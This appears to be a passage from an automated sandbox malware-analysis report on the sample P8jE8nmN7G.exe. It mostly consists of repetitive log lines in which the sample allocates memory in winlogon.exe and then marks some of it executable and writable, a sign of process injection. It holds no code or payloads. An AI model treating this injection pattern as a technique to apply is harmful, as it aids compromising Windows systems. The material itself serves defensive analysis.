Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF79000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF7B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF99000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF9B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFB9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFBB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFD6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFD9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFDB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFF9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFFB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D000000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D000000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D001000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D016000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D019000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D01B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D020000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D020000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D021000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D036000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D039000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D03B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D040000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D040000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D041000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D056000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D059000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D05B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D060000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D060000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D061000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D076000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D079000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D07B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D080000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D080000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D081000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D096000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D099000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D09B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0A0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0A0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0A1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0B6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0B9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0BB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0C0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0C0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0C1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0D6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0D9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0DB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0E0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0E0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0E1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0F6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0F9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0FB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D100000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D100000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D101000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D116000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D119000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D11B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D120000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D120000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D121000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D136000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D139000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D13B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D140000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D140000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D141000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D156000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D159000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D15B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D160000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D160000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D161000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D176000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D179000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D17B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D180000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D180000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D181000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D196000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D199000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D19B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1A0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1A0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1A1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1B6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1B9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1BB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1C0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1C0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1C1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1D6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1D9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1DB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1E0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1E0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1E1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1F6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1F9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1FB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D200000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D200000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D201000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D216000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D219000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D21B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D220000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D220000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D221000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D236000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D239000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D23B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D240000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D240000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D241000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D256000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D259000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D25B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D260000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D260000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D261000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D276000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D279000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D27B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D280000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D280000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D281000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D296000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D299000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D29B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2A0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2A0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2A1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2B6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2B9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2BB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2C0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2C0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2C1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2D6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2D9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2DB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2E0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2E0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2E1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2F6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2F9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2FB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D300000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D300000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D301000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D316000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D319000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D31B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D320000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D320000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D321000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D336000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D339000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D33B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D340000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D340000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D341000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D356000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D359000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D35B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D360000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D360000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D361000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D376000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D379000 protect: page read and writeJump to behavior
Changes memory attributes in foreign processes to executable or writableShow sources
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: 400000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: 401000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: 416000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: 419000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: 41B000 protect: page execute and read and writeJump to behavior
